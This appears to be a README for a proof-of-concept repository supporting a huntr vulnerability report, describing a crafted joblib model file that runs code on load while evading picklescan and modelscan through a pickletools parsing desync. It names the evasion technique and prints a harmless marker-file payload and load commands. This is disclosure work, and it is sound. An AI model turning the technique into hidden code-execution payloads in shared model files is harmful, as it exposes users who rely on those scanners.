⚠️ Security PoC — do NOT load outside a sandbox
This repository is a proof-of-concept for a huntr Model File Vulnerability (MFV) submission, not a real model.
evil_model.joblib is a crafted .joblib file demonstrating a scanner-evasion issue: it
achieves arbitrary code execution on joblib.load() while picklescan and modelscan
report it as clean. The technique is a pickletools.genops desync caused by a NumPy array's
inline raw data bytes (see the linked huntr report for full detail).
Payload is harmless
The embedded __reduce__ runs only:
id > /tmp/JOBLIB_PWNED; echo 'ACE via joblib.load' >> /tmp/JOBLIB_PWNED
i.e. it writes a marker file to /tmp. It does not exfiltrate data, modify files, network,
or cause damage. It exists solely to prove code execution for triage.
Verify (in a disposable sandbox/container only)
import joblib
joblib.load("evil_model.joblib") # writes /tmp/JOBLIB_PWNED
# meanwhile: picklescan -p evil_model.joblib -> "Infected files: 0"
# modelscan -p evil_model.joblib -> "No issues found! 🎉"
File integrity: sha256(evil_model.joblib) = dd6d22921e7b27b68d0522717ed2426bf0e17f3a0e3ad657df0e9d3674d30de4
This repo will be deleted after triage.